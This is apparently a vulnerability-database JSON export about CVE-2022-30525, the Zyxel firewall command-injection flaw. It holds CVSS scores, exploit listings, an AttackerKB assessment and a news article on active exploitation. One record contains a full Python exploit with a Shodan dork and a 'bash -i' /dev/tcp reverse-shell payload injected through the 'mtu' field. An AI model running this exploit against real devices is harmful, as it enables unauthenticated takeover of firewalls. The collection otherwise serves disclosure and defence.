"exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-06-04T03:10:37", "id": "DFE57B9E-96F5-564C-BD64-C3D58C9DB15D", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-23T17:02:47", "description": "# CVE-2022-30525\nZyxel \u9632\u706b\u5899\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u8fdc\u7a0b\u547d\u4ee4\u6ce8\u5165\n\n## \u5f71\u54cd\u7248\u672c\n\n### \u5f71\u54cd\u7ec4\u4ef6\n\nUSG ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-13T18:16:31", "type": "githubexploit", "title": "Exploit for OS Command Injection in Zyxel Usg Flex 100W Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-05-16T02:50:15", "id": "85E31D02-8EDA-5C9D-BF05-D41E04B2F6A6", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-24T08:14:47", "description": "# CVE-2022-30525\nZyxel \u9632\u706b\u5899\u8fdc\u7a0b\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e\uff08CVE-2022-30525\uff09\u6279...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-13T12:58:43", "type": "githubexploit", "title": "Exploit for OS Command Injection in Zyxel Usg Flex 100W Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-06-24T06:27:15", "id": "4504BF56-50B9-5F14-BA98-57209CC80328", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-23T17:02:41", "description": "# CVE-2022-30525\n####...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-15T06:20:06", "type": "githubexploit", "title": "Exploit for OS Command Injection in Zyxel Usg Flex 100W Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-05-15T06:24:15", "id": "A32ADBBF-016F-5C40-97B7-16216D138452", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-24T01:10:15", "description": "# CVE-2022-30525\n\nZyxel \u9632\u706b\u5899\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u8fdc\u7a0b\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e\n\n## \u5f71\u54cd\u7ec4\u4ef6\nUSG FLEX 100...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-16T04:45:43", "type": "githubexploit", "title": "Exploit for OS Command Injection in Zyxel Usg Flex 100W Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-05-19T10:30:01", "id": "FBDACF27-8CBC-534F-9BB8-EFEF692738E0", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-23T17:00:09", "description": "# CVE-2022-30525-mass\nzyxel firewall unauthenticated rce mass mu...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-18T12:10:11", "type": "githubexploit", "title": "Exploit for OS Command Injection in Zyxel Usg Flex 100W Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-05-18T12:21:33", "id": "AFD45BD2-75E5-571A-865F-A4AEDEB3E36F", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-13T22:57:03", "description": "## CVE-2022-30525 (Zyxel Firewall Remote Command Injection)\nA py...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-13T21:11:54", "type": "githubexploit", "title": "Exploit for OS Command Injection in Zyxel Usg Flex 100W Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-06-13T21:23:53", "id": "0A536389-CEE0-5E64-89BE-1A54E16285BE", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-24T07:15:43", "description": "# CVE-2022-30525\nCVE-2022-30525 POC exploit\n\n# Usage \n```shell\nu...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-16T09:15:43", "type": "githubexploit", "title": "Exploit for OS Command Injection in Zyxel Usg Flex 100W Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-05-24T05:41:44", "id": "5C5D6632-39BD-58FA-BE17-3AD7021DD8EE", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-24T15:40:51", "description": "# CVE-2022-30525 by 1vere$k\n**Rapid7** discovered and reported a...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-23T16:51:42", "type": "githubexploit", "title": "Exploit for OS Command Injection in Zyxel Usg Flex 100W Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-05-24T13:23:56", "id": "4CA250E4-177A-50FF-AB65-51C71DE1DCA0", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-30T14:10:27", "description": "# CVE-2022-30525 Zyxel \u9632\u706b\u5899\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e\n\nCVE-2022-30525 POC&EXP \n\nauth...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-28T07:19:31", "type": "githubexploit", "title": "Exploit for OS Command Injection in Zyxel Usg Flex 100W Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-05-29T14:38:48", "id": "6F26932E-1981-5C9F-B4CA-E98F18769C2F", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-13T01:58:33", "description": "# CVE-2022-30525\nA OS Command Injection Vulnerability in the CGI...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-12T19:04:41", "type": "githubexploit", "title": "Exploit for OS Command Injection in Zyxel Usg Flex 100W Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-06-12T19:13:13", "id": "D1D08792-13CE-5DC6-B23F-F93330D78E39", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "attackerkb": [{"lastseen": "2022-06-03T19:56:50", "description": "A OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.\n\n \n**Recent assessments:** \n \n**jbaines-r7** at May 12, 2022 1:49pm UTC reported:\n\nThis vulnerability is an easy to exploit unauthenticated and remote OS command injection vulnerability. Please see the Rapid7 analysis for details.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-12T00:00:00", "type": "attackerkb", "title": "CVE-2022-30525", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-05-12T00:00:00", "id": "AKB:0A065587-D7DE-4680-8C87-7E1C998210BC", "href": "https://attackerkb.com/topics/LbcysnvxO2/cve-2022-30525", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2022-06-15T11:57:35", "description": "### *Detect date*:\n04/12/2022\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft System Center. Malicious users can exploit these vulnerabilities to cause denial of service, gain privileges.\n\n### *Affected products*:\nMicrosoft Endpoint Configuration Manager \nMicrosoft Malware Protection Engine\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2022-24548](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24548>) \n[CVE-2022-24527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24527>) \n\n\n### *Impacts*:\nDoS \n\n### *Related products*:\n[Windows Defender](<https://threats.kaspersky.com/en/product/Windows-Defender/>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T00:00:00", "type": "kaspersky", "title": "KLA12506 Multiple vulnerabilities in Microsoft System Center", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24527", "CVE-2022-24548"], "modified": "2022-06-15T00:00:00", "id": "KLA12506", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12506/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-06-03T05:56:14", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T00:00:00", "type": "exploitdb", "title": "Zyxel USG FLEX 5.21 - OS Command Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2022-30525", "CVE-2022-30525"], "modified": "2022-06-03T00:00:00", "id": "EDB-ID:50946", "href": "https://www.exploit-db.com/exploits/50946", "sourceData": "# Exploit Title: Zyxel USG FLEX 5.21 - OS Command Injection\r\n# Shodan Dork: title:\"USG FLEX 100\" title:\"USG FLEX 100W\" title:\"USG FLEX 200\" title:\"USG FLEX 500\" title:\"USG FLEX 700\" title:\"USG20-VPN\" title:\"USG20W-VPN\" title:\"ATP 100\" title:\"ATP 200\" title:\"ATP 500\" title:\"ATP 700\" title:\"ATP 800\"\r\n# Date: May 18th 2022\r\n# Exploit Author: Valentin Lobstein\r\n# Vendor Homepage: https://www.zyxel.com\r\n# Version: ZLD5.00 thru ZLD5.21\r\n# Tested on: Linux\r\n# CVE: CVE-2022-30525\r\n\r\n\r\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\r\nimport sys\r\nimport json\r\nimport base64\r\nimport requests\r\nimport argparse\r\n\r\n\r\nparser = argparse.ArgumentParser(\r\n prog=\"CVE-2022-30525.py\",\r\n description=\"Example : python3 %(prog)s -u https://google.com -r 127.0.0.1 -p 4444\",\r\n)\r\nparser.add_argument(\"-u\", dest=\"url\", help=\"Specify target URL\")\r\nparser.add_argument(\"-r\", dest=\"host\", help=\"Specify Remote host\")\r\nparser.add_argument(\"-p\", dest=\"port\", help=\"Specify Remote port\")\r\n\r\nargs = parser.parse_args()\r\n\r\nbanner = (\r\n \"ICwtLiAuICAgLCAsLS0uICAgICAsLS4gICAsLS4gICwtLiAgLC0uICAgICAgLC0tLCAgLC0uICA7\"\r\n \"LS0nICwtLiAgOy0tJyAKLyAgICB8ICAvICB8ICAgICAgICAgICApIC8gIC9cICAgICkgICAgKSAg\"\r\n \"ICAgICAvICAvICAvXCB8ICAgICAgICkgfCAgICAKfCAgICB8IC8gICB8LSAgIC0tLSAgIC8gIHwg\"\r\n \"LyB8ICAgLyAgICAvICAtLS0gIGAuICB8IC8gfCBgLS4gICAgLyAgYC0uICAKXCAgICB8LyAgICB8\"\r\n \"ICAgICAgICAgLyAgIFwvICAvICAvICAgIC8gICAgICAgICAgKSBcLyAgLyAgICApICAvICAgICAg\"\r\n \"KSAKIGAtJyAnICAgICBgLS0nICAgICAnLS0nICBgLScgICctLScgJy0tJyAgICAgYC0nICAgYC0n\"\r\n \"ICBgLScgICctLScgYC0nICAKCVJldnNoZWxscwkoQ3JlYXRlZCBCeSBWYWxlbnRpbiBMb2JzdGVp\"\r\n \"biA6KSApCg==\"\r\n)\r\n\r\n\r\ndef main():\r\n\r\n print(\"\\n\" + base64.b64decode(banner).decode(\"utf-8\"))\r\n\r\n if None in vars(args).values():\r\n print(f\"[!] Please enter all parameters !\")\r\n parser.print_help()\r\n sys.exit()\r\n\r\n if \"http\" not in args.url:\r\n args.url = \"https://\" + args.url\r\n args.url += \"/ztp/cgi-bin/handler\"\r\n exploit(args.url, args.host, args.port)\r\n\r\n\r\ndef exploit(url, host, port):\r\n headers = {\r\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0\",\r\n \"Content-Type\": \"application/json\",\r\n }\r\n\r\n data = {\r\n \"command\": \"setWanPortSt\",\r\n \"proto\": \"dhcp\",\r\n \"port\": \"4\",\r\n \"vlan_tagged\": \"1\",\r\n \"vlanid\": \"5\",\r\n \"mtu\": f'; bash -c \"exec bash -i &>/dev/tcp/{host}/{port}<&1;\";',\r\n \"data\": \"hi\",\r\n }\r\n requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\r\n print(f\"\\n[!] Trying to exploit {args.url.replace('/ztp/cgi-bin/handler','')}\")\r\n\r\n try:\r\n response = requests.post(\r\n url=url, headers=headers, data=json.dumps(data), verify=False, timeout=5\r\n )\r\n except (KeyboardInterrupt, requests.exceptions.Timeout):\r\n print(\"[!] Bye Bye hekcer !\")\r\n sys.exit(1)\r\n finally:\r\n\r\n try:\r\n print(\"[!] Can't exploit the target ! Code :\", response.status_code)\r\n\r\n except:\r\n print(\"[!] Enjoy your shell !!!\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()", "sourceHref": "https://www.exploit-db.com/download/50946", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-17T04:22:57", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhIGKFPN0camWO34C8CoXpDcrZclcT7c6-ypv1tJcY-mfhQARONnbO0PaDlZboql9V42YAGaZgoPskGrVz5tPzQqvfdgYybZ-X2zOlmjtLVkz9OH5WANIuEnYBVQc30Kolkv9Rtc75D-jj23bTt3pHK7G32wtGGb5Nb8OWMmKPNyPHPG4WsAjmBdYDm/s728-e100/firewall.jpg>) \n--- \nImage source: [z3r00t](<https://twitter.com/z3r00t/status/1524952406139748359>) \n \nThe U.S. Cybersecurity and Infrastructure Security Agency on Monday [added](<https://www.cisa.gov/uscert/ncas/current-activity/2022/05/16/cisa-adds-two-known-exploited-vulnerabilities-catalog>) two security flaws, including the recently disclosed remote code execution bug affecting Zyxel firewalls, to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), citing evidence of active exploitation.\n\nTracked as [CVE-2022-30525](<https://thehackernews.com/2022/05/zyxel-releases-patch-for-critical.html>), the vulnerability is rated 9.8 for severity and relates to a command injection flaw in select versions of the Zyxel firewall that could enable an unauthenticated adversary to execute arbitrary commands on the underlying operating system.\n\nImpacted devices include -\n\n * USG FLEX 100, 100W, 200, 500, 700\n * USG20-VPN, USG20W-VPN\n * ATP 100, 200, 500, 700, 800, and\n * VPN series\n\nThe issue, for which patches were released by the Taiwanese firm in late April (ZLD V5.30), became public knowledge on May 12 following a coordinated disclosure process with Rapid7.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj1WgS1ZJQACshVW-DJuxbFN1iHDnt93hQWGDuUdrvFT4dN9O8VSRWqAhjBgBDvYEOeuWDABBmMFdDdZjPtw8HVPmDj4N9WfJc1aC7gLju41YxO0oHtqBseAEBBTmgg29o4K2uVe5SNz5zIxmHk_wjNbUHTIlA8zl4nN8jjTHbQqSwId4h-uhDHrVx5/s728-e100/france.jpg>) \n--- \nSource: [Shadowserver](<https://twitter.com/Shadowserver/status/1525771529941921792>) \n \n \nMerely a day later, the Shadowserver Foundation [said](<https://twitter.com/Shadowserver/status/1525561213115158529>) it began detecting exploitation attempts, with most of the vulnerable appliances located in France, Italy, the U.S., Switzerland, and Russia.\n\nAlso added by CISA to the catalog is [CVE-2022-22947](<https://nvd.nist.gov/vuln/detail/CVE-2022-22947>), another code injection vulnerability in Spring Cloud Gateway that could be exploited to allow arbitrary remote execution on a remote host by means of a specially crafted request.\n\nThe vulnerability is rated 10 out of 10 on the CVSS vulnerability scoring system and has since been [addressed](<https://tanzu.vmware.com/security/cve-2022-22947>) in Spring Cloud Gateway versions 3.1.1 or later and 3.0.7 or later as of March 2022.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and 